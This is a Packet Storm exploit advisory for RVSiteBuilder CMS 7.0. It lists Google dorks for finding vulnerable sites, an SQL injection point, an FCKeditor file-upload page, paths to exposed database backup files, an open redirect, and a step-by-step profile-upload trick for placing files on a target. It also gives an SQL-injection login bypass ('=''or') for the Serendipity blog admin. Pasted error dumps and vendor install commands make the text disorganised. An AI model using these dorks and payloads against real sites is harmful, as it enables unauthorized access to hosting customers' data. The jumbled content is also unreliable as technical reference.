exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection

RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection
Posted Feb 14, 2019
Authored by KingSkrupellos

RVSiteBuilder RVGlobalSoft CMS version 7.0 suffers from bypass, database disclosure, file download, path disclosure, remote file upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure, file upload
SHA-256 | bf7f23d5c0d4de74e897a5b9ebfae16164f9f11c8e83854683f9029df2fd3c7e

RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection

Change Mirror Download
#################################################################################################

# Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities

Vulnerabilities are =>
******************
SQL Injection / File Upload / Authentication Bypass / Database Disclosure

# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 14/02/2019
# Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com
+ dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
+ twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
# Version : 7.0 and all previous versions.
# Google Dork : inurl:''/rvsindex.php/''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types : CWE-209 [ Information Exposure Through an Error Message ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-200 [ Information Exposure ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
+ CWE-592 [ Authentication Bypass Issues ]
+ CWE-23 [ Relative Path Traversal ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-36 [ Absolute Path Traversal ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-548 [ Information Exposure Through Directory Listing ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101

#################################################################################################

# RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities
*********************************************************************************************

# Vulnerabilities and Exploits includes =>
************************************

1) Full Path Disclosure Vulnerability
2) SQL Injection Vulnerability
3) Arbitrary File Upload Vulnerability
4) Arbitrary File Download Database Backup .sql Vulnerability
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload
6) Blog Administration Control Panel Authentication Bypass Vulnerability
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
8) Information Exposure Through an Error Message
9) Permissions, Privileges, and Access Controls

#################################################################################################

# Description : RVglobalsoft is the leading software solutions for hosting provider.
***********************************************************************

# Google Dork 1 : inurl:''/rvsindex.php/''

# Google Dork 2 : inurl:''/rvsindex.php?/user/login''

# Google Dork 3 : inurl:''/rvsindex.php/user/register''

# Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js

#################################################################################################

# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] =>
*****************************************************************************************

TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]

FOR CPANEL =>

pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

FOR DURECTADMUN =>

pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with
SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with
SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Non-static method SGL_FrontController::isGoToClearCached()
should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear
/RVSeagullMod/lib/SGL/FrontController.php on line 257

Strict Standards: Declaration of SGL_MDB2::query() should be compatible with
MDB2_Driver_Common::query($query, $types = NULL, $result_class =
true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish
/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82

Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename()
should not be called statically, assuming $this from incompatible context in
/opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60

Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS
/public_html/rvscommonfunc.php on line 174
Please contact your host provider ssh as root to server and run.

Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20

####################################################################################################

PATH => TARGET/ComponentAndUserFramework.php

Please edit /home2/DOMAINADDRESS/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54
/usr/share/pear:/usr/local/lib/php"

# PATH for View Homepage => TARGET/rvsindex.php

####################################################################################################

# RevSiteBuilder Admin Login Control Panel Authentication Bypass =>
**************************************************************

TARGET/admin or this is the Admin Panel way =>

/rvsindex.php?/user/login/

# PATH Admin Panel Login WordPress =>

TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1

# PATH Admin Panel Login Joomla =>

TARGET/administrator

# PATH Admin Panel Login osCommerce =>

TARGET/admin

# PATH Admin Panel Login OpenCart =>

TARGET/admin

Note : Some RVSiteBuilder websites uses wordpress and joomla
but all files belongs to revsitebuilder and rvglobalsoft software.
It is totally weird vulnerability.

They have path like TARGET/blogweb or TARGET/osc

But some sites gives this error. Sometimes it asks for username and password.

Please contact your provider edit file php.ini
change include_path to
include_path = ".:/usr/lib/php:/usr/local/lib/php"
save file and restart apache

####################################################################################################

# PATH for Uploaded Documents =>

TARGET/documents/

####################################################################################################

# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => T

TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/

# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources

####################################################################################################

# PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/

####################################################################################################

# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/

####################################################################################################

# PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo

####################################################################################################

# PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG

####################################################################################################

# PATH Learn Version => TARGET/js/scriptaculous/VERSION

####################################################################################################

# PATH for Optimizer => TARGET/optimizer.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

# Other Paths that gives same error =>

#TARGET/rvsMasterCompoDB.php
#TARGET/rvsStaticWeb.php
#TARGET/rvscommonfunc.php
#TARGET/rvssetup.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

#QuickForm tutorial example - *Enter your name:

#/scripts/rvslib/Pear/quickFormTest.php
#/themes/default/default/testForms.html

####################################################################################################

#{if:adminApprove} {adminApprove}
#/themes/rvtheme/authweb/authPage.html

####################################################################################################

#{foreach:aFaqData,key,aValue} {if:aValue.category_name}
#/themes/rvtheme/faqweb/viewFaqWeb.html

###################################################################################################

#{if:forumsInstall} - Search for forums
#TARGET/themes/rvtheme/forums/blocksearch.html

####################################################################################################

# Testing forms
# /themes/default/testForms.php

#################################################################################################

# RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability

# TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login

# Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS

#################################################################################################

# {translate(pageTitle)} Contactus
# /themes/rvtheme/main/contactMail.html

#################################################################################################

#{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
#/themes/rvtheme/newsletter/authorize.html
#/themes/rvtheme/newsletter/list.html
#/themes/rvtheme/newsletter/uikit_list.html

#################################################################################################

#RVTheme Admin Area and Users useable Login Paths =>

#/themes/rvtheme/user/account.html
#/themes/rvtheme/user/accountSummary.html
#/themes/rvtheme/user/blockLogin.html
#/themes/rvtheme/user/blockLogout.html
#/themes/rvtheme/user/horizontalBlockLogin.html
#/themes/rvtheme/user/loginForgot.html
#/themes/rvtheme/user/prefUserEdit.html
#/themes/rvtheme/user/profile.html
#/themes/rvtheme/user/uikit_login.html
#/themes/rvtheme/user/uikit_loginForgot.html
#/themes/rvtheme/user/uikit_prefUserEdit.html
#/themes/rvtheme/user/uikit_userAddUseCompoDB.html
#/themes/rvtheme/user/uikit_userPasswordEdit.html
#/themes/rvtheme/user/userAdd.html
#/themes/rvtheme/user/userAddUseCompoDB.html
#/themes/rvtheme/user/userPasswordEdit.html
#/themes/rvtheme/user/verticalBlockLogin.html
#/themes/rvtheme_admin/articleweb/admin_articleEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleManager.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
#/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
#/themes/rvtheme_admin/css/

#####################################################################################################

#Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt

#####################################################################################################

#Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js

#####################################################################################################

Getting started with Seagull Project => [ Seagull PHP Framework - (c) Seagull Systems 2003-2007 ]

/rvsindex.php?/default/masterLayout/layout-navtop-3col.css/

#####################################################################################################

# RevSiteBuilder SQL Injection Vulnerability =>
*****************************************

#Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be
compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local
/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible
with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php
/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

#################################################################################################

# What You See Is What You Get [ WYSIWYG ] Exploiter =>
*******************************************************

# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit

# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

# Example Site => /images/....

# Allowed File Extensions => .txt .png .gif .jpg .xml

# Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server

Please contact your host provider ssh as root to server and run.

For cpanel
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

For directadmin
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

Tutorial '' How to download RVsiteBuilder package file manually ? ''

For cPanel
--------------------

SSH to your cPanel server as root and run command

cd /usr/local/cpanel/whostmgr/docroot/cgi/

rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/

rm -f rvsitebuilderinstaller.tar

wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar

tar -xvf rvsitebuilderinstaller.tar

rm -f rvsitebuilderinstaller.tar

mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

/usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php

Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/

--------------------

For DirectAdmin

--------------------

SSH to your cPanel server as root and run command

cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

php scriptdownloadpackage.php

Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/

Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/

Reference => rvskin.com/rvlogin/rvloginssh

##################################################################################################

# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability

# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql

# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql

# Example Site DB Backup View => archive.is/Demkr

###################################################################################################

1) Register yourself to the site

TARGET/rvsindex.php?/user/register/

It says => You have successfully been registered. Please check your email for confirmation of your password.

Note : Confirm your registration in order to proceed.
Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration.
Pay attention : When you register choose your nickname carefully because it is important.

It says => Activation is successfully. Please login.

2) Login to the User Interface =>

TARGET/rvsindex.php?/user/login/action/login

3) You can use Account - User Preference - User Password Change Area

/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/

4) Go to your Profile like this =>

TARGET/rvsindex.php?/user/account/action/viewProfile/

Edit these Values

Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)

It says => Your profile details have been successfully updated

PATH : /themes/rvtheme/images/YOURNUCKNAME.

Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html

Just . [ dot ] is important here. You will see your index on that site.

#################################################################################################

# Serendipity RevSiteBuilder Blog Administration

# /blogweb/serendipity_admin.php

# Username : '=''or'
# Password : '=''or'

# You can use for both of them as '' admin '' '' admin ''

# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true

# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal

# /blogweb/uploads/yourfilename.rar

# Solution for Serendipity Blog Administration

# To mitigate this issue please upgrade at least to version 2.0.2:

# Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

# Please note that a newer version might already be available.

#################################################################################################

How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess

cPanel
ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh
Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process.
Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.

DirectAdmin
ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh
For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)
2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl
2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod
Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15
Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process.
Login to DirectAdmin as "admin" and Configure plugin on your panel.
RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but
you can set plans in user level by RVsitebuilder Admin
Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'

#################################################################################################

RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/

RVSiteBuilder Installation => rvsitebuilder.com/installation/

RVSiteBuilder and RVGlobalSoft Tutorials =>

rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm Digital Security Team

#################################################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close